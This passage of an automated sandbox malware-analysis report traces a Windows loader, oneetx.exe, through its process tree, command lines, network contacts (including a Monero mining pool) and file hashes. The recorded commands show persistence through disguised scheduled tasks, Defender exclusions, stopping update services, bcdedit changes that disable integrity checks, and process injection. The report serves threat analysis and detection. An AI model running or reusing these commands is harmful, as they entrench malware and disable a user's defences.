PID 1404 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1404 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1404 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1404 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1404 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1404 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1404 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1404 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1404 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 1404 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 1404 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 1404 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 1404 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 1404 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 1404 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 1404 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 1404 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 1404 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 1404 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 588 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 588 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 588 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 588 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 588 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 588 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 588 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1404 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 1404 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 1404 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\oneetx.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe

"C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {AD812B81-F212-47D8-B785-2640B8481481} S-1-5-21-3518257231-2980324860-1431329550-1000:VWMLZJGN\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230702001509.log C:\Windows\Logs\CBS\CbsPersist_20230702001509.cab

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {8750CB4D-8FD1-4C47-BEFF-24F4B57F29B4} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

Network

Country Destination Domain Proto
RU 5.42.65.80:80 5.42.65.80 tcp
DE 45.9.74.80:80 45.9.74.80 tcp
NL 45.66.230.149:80 45.66.230.149 tcp
NL 45.12.253.56:80 45.12.253.56 tcp
US 8.8.8.8:53 rcn.tuktuk.ug udp
NL 85.209.3.4:11285 rcn.tuktuk.ug tcp
NL 85.209.3.4:11285 rcn.tuktuk.ug tcp
NL 85.209.3.4:11285 rcn.tuktuk.ug tcp
US 8.8.8.8:53 f73d87fc-e6ba-451d-82b7-96201f201a06.uuid.duniadekho.bar udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
US 8.8.8.8:53 server1.duniadekho.bar udp
BG 185.82.216.50:443 server1.duniadekho.bar tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 stun4.l.google.com udp
US 74.125.204.127:19302 stun4.l.google.com udp
US 8.8.8.8:53 luckytradeone.com udp
US 172.67.181.198:443 luckytradeone.com tcp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 stun1.l.google.com udp
US 142.251.125.127:19302 stun1.l.google.com udp

Files

\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

